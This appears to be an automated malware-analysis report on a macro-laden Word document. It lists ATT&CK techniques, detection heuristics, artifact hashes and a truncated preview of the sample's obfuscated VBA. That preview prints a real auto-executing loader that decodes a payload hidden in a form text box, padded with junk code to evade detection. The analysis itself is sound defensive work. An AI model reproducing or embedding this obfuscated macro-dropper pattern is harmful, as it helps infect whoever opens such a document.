Verdict: MALICIOUS
Risk Score: 164

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
The sample is an OOXML document containing a VBA project with a Document_Open macro, so the code runs as soon as the document is opened with macros enabled. The macro uses the Shell() function, a critical indicator of malicious activity, to execute arbitrary commands. The obfuscated VBA suggests an attempt to conceal the execution of a secondary payload, likely downloaded from an external source.
Heuristics (6)
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project; VBA macros present.
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 35 URLs extracted from this sample are XML namespace/schema URIs found in the document text (OOXML body / shared strings), none reached from the macro, so they do not reveal where the secondary payload is fetched from.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13629 bytes | d1848f9e7590d5e0c71b4f2870bc0333a7ada4e80e0da9b493a023ae4cb716e9 |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 52736 bytes | f0b2cccb10ad8a1b0a0d61d7985c2f13dd388cb3f3da9beb69d8486313524126 |

Preview script for macros.bas (first 1,000 lines of the extracted script, as cut off by the analyzer). The junk loops, always-true comparisons and dead Else branches are padding; the functional statements are the creation of frmMain, the read of its text box, and the decoding calls blmY6e1() and StrConv() in Initialize():

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
If 9 < 177 Then ' iTk2Nf
Else ' gPaWt5
MsgBox "e0dvUKIVm"
End If
Dim JaYlESZ6
JaYlESZ6 = 90
While JaYlESZ6 < 587
JaYlESZ6 = JaYlESZ6 + 39
Wend
Wo9TzXup = 43341
Urjiz0Xq = Bn9WjNXg & JaYlESZ6
Dim CR7dIkJty
CR7dIkJty = 176
While CR7dIkJty <= 956
CR7dIkJty = CR7dIkJty + 32
Wend
veLkl8I = "C8wFaXWm"
cMEzR = pDiTIlJ & CR7dIkJty
Dim Z9EGQerH As Object
If 33 < 198 Then ' RLM1Yc
Else ' g4psf5vKa
Debug.Print "AfqQuy"
End If
Dim n7fjgWSIo
n7fjgWSIo = 141
While n7fjgWSIo < 421
n7fjgWSIo = n7fjgWSIo + 8
Wend
alz8xid = "IyC42EAM"
Hq4osz = br7QIM1 & n7fjgWSIo
Set Z9EGQerH = New frmMain
If 30 < 193 Then ' rlJ3rHSa0
Else ' vYx2jc8r
MsgBox "xtycA1nl"
End If
Dim aiHw8ukta
aiHw8ukta = 148
While aiHw8ukta <= 473
aiHw8ukta = aiHw8ukta + 34
Wend
gRYporX = "ITnegvSrx"
wRm1drPq = jj9RS & aiHw8ukta
Call Initialize(Z9EGQerH.txtBox.Text)
End Sub
Attribute VB_Name = "csyrdX0R"
Sub Initialize(AFVqU As String)
If 59 < 195 Then ' bJ6guWq
Else ' zDcwsR
Debug.Print "jtfpmMGnq"
End If
If 59 < 195 Then ' L19gjc7WI
Else ' aZvXfc
MsgBox "VqoIh1bv"
End If
If 45 < 166 Then ' x8nZUdiaj
Else ' ISak6
Debug.Print "WdwnUXuQ"
End If
Dim u5zh19
u5zh19 = 40
While u5zh19 <= 387
u5zh19 = u5zh19 + 6
Wend
VTvCl = 21007
HAtNj = tWEo3B6zF & u5zh19
If 19 < 161 Then ' FZ7aqf
Else ' Tm1xRL
MsgBox "DRxm6"
End If
Dim VJFGBZuiw
VJFGBZuiw = 61
While VJFGBZuiw <= 984
VJFGBZuiw = VJFGBZuiw + 7
Wend
sydBCtqTU = 28761
O6egK7yAr = FhoStlz & VJFGBZuiw
On Error Resume Next
Dim NhMGU3r7
NhMGU3r7 = 197
While NhMGU3r7 <= 772
NhMGU3r7 = NhMGU3r7 + 52
Wend
q5cxj = "oB4rY"
om13t7K9N = JonexAB & NhMGU3r7
If 61 < 174 Then ' clWYVf1Qv
Else ' nKvd7
Debug.Print "erHaWGmCb"
End If
Dim TmpTs0tF4
TmpTs0tF4 = 97
While TmpTs0tF4 <= 467
TmpTs0tF4 = TmpTs0tF4 + 57
Wend
jX9ioOJ3E = 7286
wAwY3eb6X = vznQa & TmpTs0tF4
Dim PT9q3
PT9q3 = 97
While PT9q3 <= 467
PT9q3 = PT9q3 + 57
Wend
nGWiZs1D = "nlmspBzaM"
qN8kHEx = XUdgokvl7 & PT9q3
Dim kfmP2Zr
kfmP2Zr = 133
While kfmP2Zr <= 852
kfmP2Zr = kfmP2Zr + 20
Wend
xPsOjpCtd = 27846
XDPp87oNm = Ft7EwD & kfmP2Zr
If 23 < 210 Then ' N5JyHb
Else ' xoPyKWMc
Debug.Print "cpkdYf"
End If
Dim bliaws
bliaws = 247
While bliaws < 593
bliaws = bliaws + 20
Wend
FVzycMOp1 = 12977
WWoNexF6 = rkENiQfz5 & bliaws
Dim ZICcXSZ
ZICcXSZ = 247
While ZICcXSZ <= 593
ZICcXSZ = ZICcXSZ + 20
Wend
YeQDrLxO = "IfV9zTHG"
fyHcXe = EHYtxN3m & ZICcXSZ
If 44 < 208 Then ' HzLO9G
Else ' VetMK9
Debug.Print "RQa2M9"
End If
Dim gasnubg
gasnubg = 183
While gasnubg < 303
gasnubg = gasnubg + 20
Wend
qY6tmbrwP = "yU9bS"
Kn8DKsvu = rY9zEO5 & gasnubg
Dim iIJzv25B
iIJzv25B = 185
While iIJzv25B < 879
iIJzv25B = iIJzv25B + 34
Wend
iHvdz8Va = 49726
GEnrs9f = DneRU0pA8 & iIJzv25B
Dim qJ0kBs
qJ0kBs = 28
While qJ0kBs < 282
qJ0kBs = qJ0kBs + 16
Wend
dgSmK = 9620
CejQy3 = NvstR & qJ0kBs
If 54 < 150 Then ' F8DiVg1
Else ' uYp45
Debug.Print "EB6pGg"
End If
If 57 < 182 Then ' in5cjmqQ
Else ' LilwV7
Debug.Print "NwajsX2Z"
End If
Dim XzRH1o
XzRH1o = 7
While XzRH1o < 373
XzRH1o = XzRH1o + 48
Wend
VHPjY = 35763
CinBqbT = rKXmCqY7 & XzRH1o
If 9 < 157 Then ' LjMZ9Q1xA
Else ' QjorvPbH
MsgBox "VMin8"
End If
AFVqU = blmY6e1(AFVqU)
If 42 < 231 Then ' OFDN6KH5
Else ' eGdxvl
MsgBox "eH43t"
End If
AFVqU = StrConv(AFVqU, vbUnicode)
Dim LtwDH8B
LtwDH8B = 27
While LtwDH8B < 389
LtwDH8B = LtwDH8B + 59
Wend
xowJnUf = 63120
jiFRp = nvJsFUVr & LtwDH8B
If 11 < 201 Then ' xs0kgDl
Else ' eesYgGwU
MsgBox "gWjYGerzl"
End If
Dim uB5le
uB5le = 72
While uB5le <= 848
uB5le = uB5le + 5
Wend
XbKRS6 = "nIOJjs"
sqmQw = BwMHOLVP & uB5le
Dim XHqbk
XHqbk = 250
While XHqbk <= 817
XHqbk = XHqbk + 2
Wend
lqEjWdmyZ = "y0w4aOoG"
TVAb297O ... (truncated)
```
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))